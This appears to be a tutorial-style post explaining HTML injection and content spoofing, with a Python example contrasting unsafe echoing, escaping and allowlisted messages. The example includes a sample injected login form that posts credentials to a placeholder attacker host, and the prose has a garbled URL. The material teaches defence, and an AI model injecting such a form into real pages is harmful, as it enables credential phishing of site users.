HTML injection and content spoofing
By Hackfreaks official.
Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site.
Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.
Developers use HTML to define the structure of a web page, so if an attacker can inject HTML and the site renders it, the attacker can change what the page looks like. This technique of tricking users into submitting sensitive information through a fake form is referred to as phishing. For example, if a page renders content that you can control, you might be able to add a <form> tag to the page asking the user to reenter their username and password. When a user submits this form, the information is sent to an attacker’s website http://.com/capture.php via an action attribute.
Content spoofing is very similar to HTML injection, except that attackers can only inject plaintext, not HTML tags. This limitation is typically caused by sites either escaping any included HTML or stripping HTML tags when the server sends the HTTP response. Although attackers can’t format the web page with content spoofing, they might be able to insert text, such as a message, that looks as though it’s legitimate site content. Such messages can fool targets into performing an action but rely heavily on social engineering.
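The difference between the two cases above, seen from the rendering side, as an added example that is not part of the original text: a raw echo lets an injected form reach the HTML parser, escaping reduces it to visible text but still lets spoofed plaintext through, and choosing from fixed server-owned messages closes that gap. The function names, the attacker.example host, the sample strings and the allowlist approach are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs; attacker.example is a placeholder host.
INJECTED_FORM = ('<form action="http://attacker.example/capture.php">'
                 '<input name="username"><input name="password"></form>')
SPOOF_TEXT = "Your session expired. Call 555-0100 and confirm your password."

# Fixed, server-owned messages: the request only selects one by code.
MESSAGES = {"expired": "Your session has expired. Please sign in again.",
            "denied": "You do not have access to this page."}


def render_unsafe(message):
    """Vulnerable pattern: user-controlled text concatenated into markup."""
    return "<div class='notice'>" + message + "</div>"


def render_escaped(message):
    """Encode &, <, > and quotes so the browser shows tags as literal text."""
    return "<div class='notice'>" + html.escape(message, quote=True) + "</div>"


def render_allowlisted(code):
    """Never echo request text; unknown codes get a generic message."""
    text = MESSAGES.get(code, "Something went wrong.")
    return "<div class='notice'>" + html.escape(text) + "</div>"


class FormFinder(HTMLParser):
    """Collects the action attribute of every <form> the parser sees."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action"))


def form_actions(page):
    """Return the form actions a parser would find in the rendered page."""
    finder = FormFinder()
    finder.feed(page)
    finder.close()
    return finder.actions


if __name__ == "__main__":
    print("unsafe    :", form_actions(render_unsafe(INJECTED_FORM)))
    print("escaped   :", form_actions(render_escaped(INJECTED_FORM)))
    print("spoof kept:", SPOOF_TEXT in render_escaped(SPOOF_TEXT))
    print("allowlist :", SPOOF_TEXT in render_allowlisted(SPOOF_TEXT))
```

The same form_actions check can be pointed at rendered responses in a test suite to flag any page where a form posts to a host the site does not own.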